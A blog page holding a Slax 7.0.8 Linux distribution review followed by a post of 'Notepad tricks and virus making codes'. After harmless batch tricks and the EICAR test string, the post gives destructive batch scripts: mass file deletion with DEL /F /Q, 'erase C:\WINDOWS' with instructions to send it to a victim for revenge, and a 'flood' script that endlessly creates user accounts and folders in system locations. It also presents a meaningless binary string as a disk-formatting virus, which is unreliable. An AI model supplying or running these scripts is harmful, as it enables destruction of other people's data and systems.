Thursday 11 September 2014

Slax 7.0.8 Review

Slax 7  desktop
SLAX 7 Review
KD4 Desktop
Today review goes to a Linux portable distro call Slax. Is a very compact Os which perform great on old and new PCs with a Good user interface with the KDE interface which is very great environment.
Slax is a Live operating system based on Linux. Live means it runs from an external media without any need for permanent installation. Slax boots from USB mass storage devices such as Flash Drive keys as well as from regular hard drives and CD/DVD discs. Entire Slax operating system resides in a single directory /slax/ on your device, making it easier to organize with your other data.
Slax provides KDE4 desktop environment already preconfigured for the most common tasks. Included are applications and tools for data recovery, multimedia playback, instant messaging, web and more. Slax has zram support activated by default, which is a new technology for automatic RAM compression. Thanks to it, Slax runs on computers with as low as 48MB of RAM (in text mode). You can put Slax on wide range of different filesystems, including EXT (ext2,ext3,ext4), btrfs, and even FAT and NTFS.
When Slax is started from a read-only media such as CD/DVD, it keeps all system modifications in memory only, and all the modifications are lost when you reboot. On the other hand, if you run Slax from a writable device such as USB Flash Drive, it stores all changes there, so all your configurations and modifications are restored next time you boot, even if it is on a different computer.
Slax is available for 32bit and 64bit processor architectures.

System requirements to run Slax Slax 32bit version     Slax 64bit version       
Processor:     i486 or newer CPU, all Intel processors and AMD processors will work     An x86_64 CPU, like AMD Athlon 64, Opteron, Sempron, Intel Core 2/i3/i5/i7, and others       
Memory:     48 MB of RAM for text-mode 256 MB of RAM for KDE desktop     64 MB of RAM for text-mode 256 MB of RAM for KDE desktop       
Peripherals:     CD or USB drive to boot from     CD or USB drive to boot from       
Optionally:     network card, sound card     network card, sound card    






Here is a snapshot of Slax 7.0.8 which run on my custom PC with low specifications
Intel Pentium Celeron 2.53GHz
Mobo: VC37 640Mb of Ram
750Gb of Storage
4Mb Matrox Graphic Card
Though my Graphic card is a Creepy 4Mb which i cannot Play flash video on windows but it
work pretty cool on Slax 7 
Gwenview photo viewer

Konqueror Web browser and File Manager

It comes with a Popular web browser Firefox

Dolphine File Manager

Slax 7 system settings. very simple

Slax Network Connection interface.

The Network connection of Slax 7 is very simple.It even work with my Huawei USB modem.
which other Linux distros does not.
Slax 7 comes with your basic needs.
Graphic
KDE Image viewer                                 an image viewer
Okular                                                      Document viwer 
Kcolor                                                       Color chooser

Internet
Firefox                                                     web browser
Pidgin                                                      Internet messenger
KRDC                                                     Remote Desktop Client
Krfb                                                         Desktop Sharing
KNetAttach                                             Network folder wizard

Multimedia
SMPlayer                                     multimedia player
JukMusick                                   Audio player
KMix                                            Audio controller

Utillities
ArkArchiving Tool                            Archiving tool
Kate                                                Text editor
Kcalc                                                Calculater
Sweeper                                          System cleaner
you can also download a lot of module on it own website.

If you want a portable Linux distro (217MB) for home and Office use i will edge you to use Slax.
It work out of the box.

Download Slax 7.0.8 ISO here 
     



Wednesday 19 June 2013

Notepad tricks and virus making codes


Notepad tricks and virus making
1. Log Diary Trick
Have you ever wanted to make your own diary on your computer ? Why not try notepad..

Open notepad 
Type .LOG 
Save the file as LOG.txt 

Now when you open notepad, the date and time will automatically be inserted
2. The 4335 Rule
This trick may not work on all computers
This has been surprising users for quite some time. When you enter a few secret codes, notepad hides them.
Open notepad and type in BUSH HID THE FACTS 
Close notepad and open it again to see the magic 

Can you read it again ? This is called the 4335 Rule. This means, if the first word is four words, the second and third as three words, and the fourth as five words, then you follow the 4335 rule and the text is hidden.

3. Make Questions
Want to make something interactive ? Need to make questions ? Here is an example of a question made with notepad where the user got the answer correct.



To do this, just type the following code in notepad.

@ECHO OFF
ECHO:
ECHO ………………………………………..
ECHO PRESS 1 or 2 to select your task, or 3 to EXIT.
ECHO ………………………………………..
ECHO.
ECHO 1 – This info was given by  GeniuskidECHO 2 – This info was not given by Geniuskid
ECHO 3 – EXIT
ECHO.
SET /P M=Type 1, 2, or 3, then press ENTER:
echo:
IF %M%==1 GOTO Correct
IF %M%==2 GOTO Wrong
IF %M%==3 GOTO EXIT
:Correct
echo You are right !!
GOTO END
:Wrong
echo You are wrong. This info was really given by GeniuskidGOTO END
:END
PAUSE
goto EXIT
:EXIT

Now save the file as Question.bat and run the file.
Please note that the file type should be kept as ALL Files while saving it as a .bat file.

You can modify the code for your convenience. Change the bold text and try it out.

4. Make the Matrix


To make this, open notepad and type the following:
@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Save this file as Matrix.bat
Make sure the file type is kept as ALL FILES while saving it as a .bat file.

Open the saved file and see the magic.

5> Lock Folders using Notepad
This trick may not work on all computers

Lets say you want to lock a folder named PICS in your D:\ drive , whose path is D:\PICS

Then the code should be something like this:
ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}

Pics is your folder name. Use the name of the folder in place for pics. Save the text file as lock.bat in the same drive.

To unlock this locked folder:

Open another new notepad text file and type the following:
ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics

Save the text file as key.bat in the same drive. Here again, pics is the name of the folder. Change it to the folder you want to lock.

6> Make a fake Virus POP UP
Type the following code in notepad:

@echo off
msg * WARNING
msg * VIRUS ENTERED YOUR PC

Save the file as pop.bat and run it. You should get two pop up messages. There has been an issue on some computers, but it should work on most computers.

7>Create a command prompt Virus message


Type the following in notepad:

@ echo off
title Virus
echo Your system is affected by virus
PAUSE
echo:
echo Windows will now try to undo changes
PAUSE
echo:
echo FAILED !
PAUSE
echo:
echo Your system is corrupt
PAUSE

Save the file as virus.bat and run the file.

8>Test your antivirus by EICAR STANDARD ANTIVIRUS TEST
Now, you can check if your antivirus really works. Type the following in notepad:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Save the file as virus-test.txt
Scan the file. If your antivirus detects this file as a virus and tries to remove it, then you can be sure your antivirus is a good one. This is a much easier way, than actually downloading a virus to test it. This sample virus code is perfectly harmless and allows you to test your antivirus. A good antivirus like MS Security Essentials will detect this test virus even before you scan it.

That's all the tricks I'm sharing, at least for now. All the tricks above are perfectly safe and will not harm your computer in any way. There are many destructive notepad tricks as well, like making a real virus which kills the Operating System, but personally, I believe that is only meant for developers who want to make their OS security better. Use these tricks in your best behavior.


9>Fake Virus Batch File

I got this prank from WikiHow. I love it because it looks the most like an actual attack. Copy and paste the following into an open Notepad window, then save the file with any name you choose and an extension of “.bat”

Here’s the code:

cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:sleep5000.vbs
echo Wscript.Sleep 3000>C:sleep3000.vbs
echo Wscript.Sleep 4000>C:sleep4000.vbs
echo Wscript.Sleep 2000>C:sleep2000.vbs
cd %systemroot%System32
dir
cls
start /w wscript.exe C:sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:Documents and SettingsAll UsersStart MenuPrograms
mkdir h4x
start /w wscript.exe C:sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:sleep3000.vbs
echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
echo start hax.exe
start /w wscript.exe C:sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:sleep2000.vbs
pause
shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”

10> Make A Powerfull Virus With Only Notepad 
delete all folders/files just put this:

DEL /F /Q *

Into notpad and save it as whateveryouwant.cmd

It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER

If you just want to delete the WINDOWS file do this:

The only thing you need again is Notepad.

Now, to test it, create a textfile called TEST.txt in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.

11>Simple Virus in notepad
This is a simple virus that formats HDD. Write The Following In Notepad Exactly as it says 01001011000111110010010101010101010000011111100000 Save As An EXE Any Name Will Do 
Send the EXE to People And Infect
WARNING: I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS!!!

12>If you think that notepad is useless then you are wrong because you can
now do a lot of things with a notepad which you could have never
imagined.In this hack I will show you how to make simple .bat file
(virus) that can't be detected by any antivirus

Here are some good viruses ,i am not responsible for any kind of damage
to your system ... :)

* Copy this to notepad and save as flood1.bat.....


@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1